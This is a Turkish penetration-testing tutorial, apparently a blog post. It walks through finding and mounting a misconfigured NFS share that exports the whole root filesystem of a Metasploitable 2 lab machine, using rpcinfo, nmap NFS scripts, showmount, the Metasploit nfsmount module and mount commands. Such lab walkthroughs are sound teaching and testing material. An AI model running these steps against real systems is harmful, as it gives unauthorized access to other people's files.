NMAP Betikleri, Showmount Komutu ve MSF nfsmount Auxiliary Modülü ile NFS Paylaşımlarına Erişimin Sağlanması

Lızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerden bir takım bilgiler elde edilebilir. Bu yazıda, Metasploitable 2 üzerinde güvenilir olarak yapılandırılmayan NFS servisi istismar edilecek ve paylaşılan veriler elde edilecektir.

NFS (Network File System) ağdaki bilgisayarların (özellikle UNIX/Linux işletim sistemlerinin) ortak bir dosya sistemine, yerel diskleri kadar kolay ulaşmasını sağlayan, RPC temelli dağıtık dosya sistemi yapısıdır. Böylece bir ağ üzerindeki birden fazla bilgisayarda bulunan dosyaların, tek bir sabit diskte yer alıyormuşçasına yönetilmelerini sağlar. Bunun yanında NFS servisi uygun şekilde yapılandırılmamışsa yetkisiz erişim sağlanabilir.

 

1) NFS Servisinin Keşfi

IP adresi 192.168.162.131 olan Metasploitable 2 sistemindeki RPC tabanlı servislerin tespiti için rpcinfo aracı kullanılabilir.

rpcinfo -s 192.168.162.131
rpcinfo -p 192.168.162.131

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-01

 

Nmap ile ağ taramasının sonucu aşağıdaki gibidir.

nmap -pT:111,2049 -sV -Pn –open 192.168.162.131
nmap -pU:111,2049,35166 -sV -Pn –open 192.168.162.131

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-02

 

 

2) Paylaşım Dizininin Tespiti

Paylaşım dizininin tespiti için Nmap nfs-ls ve nfs-showmount betikleri, showmount komutu veya MSF nfsmount auxiliary modülü kullanılabilir.

Nmap nfs-ls betiği ile NFS üzerinden yapılan paylaşımları (dizinleri ve dosyaları) ve erişim haklarını listeler. Benzer olarak nfs-showmount betiği ile paylaşımlar listelenebilir.

nmap -p111 -Pn –open –script=nfs-ls 192.168.162.131
nmap -p111 -Pn –open –script=nfs-showmount 192.168.162.131

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-03

 

Nmap nfs-showmount betiği yerine Linux showmount komutu da kullanılabilir.

showmount -e 192.168.162.131

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-04

 

MSF nfsmount auxiliary modülü ile de NFS paylaşımları listelenebilir. Bu amaçla öncelikle modül seçenekleri listelenir.

search nfsmount
use auxiliary/scanner/nfs/nfsmount
show options

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-05

 

IP listesi verilerek UDP 111 portu üzerindeki sorgular ile paylaşım dizini elde edilir.

set RHOSTS 192.168.162.131
run

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-06

 

Böylece tüm diskin (/) paylaşıldığı görülmektedir.

Paylaşım ayarı, NFS paylaşımının yapıldığı Metasploitable 2 sisteminin /etc/exports dosyası içeriğinde de görülmektedir.

cat /etc/exports

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-07

 

3) Paylaşıma Erişim Sağlanması

Paylaşıma erişim için mount komutu kullanılabilir.

mkdir Desktop/BaglantiDizini
mount -t nfs 192.168.162.131:/ Desktop/BaglantiDizini/ -o nolock
ls -la Desktop/BaglantiDizini/

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-08

 

Böylece paylaşım masaüstündeki bir klasöre eşleştirilmiştir.

accessing-disk-system-of-remote-computer-by-exploiting-nfs-service-via-nmap-scripts-showmount-command-and-msf-nfsmount-auxiliary-module-09

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir yorum

Yorum yapabilirsiniz

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.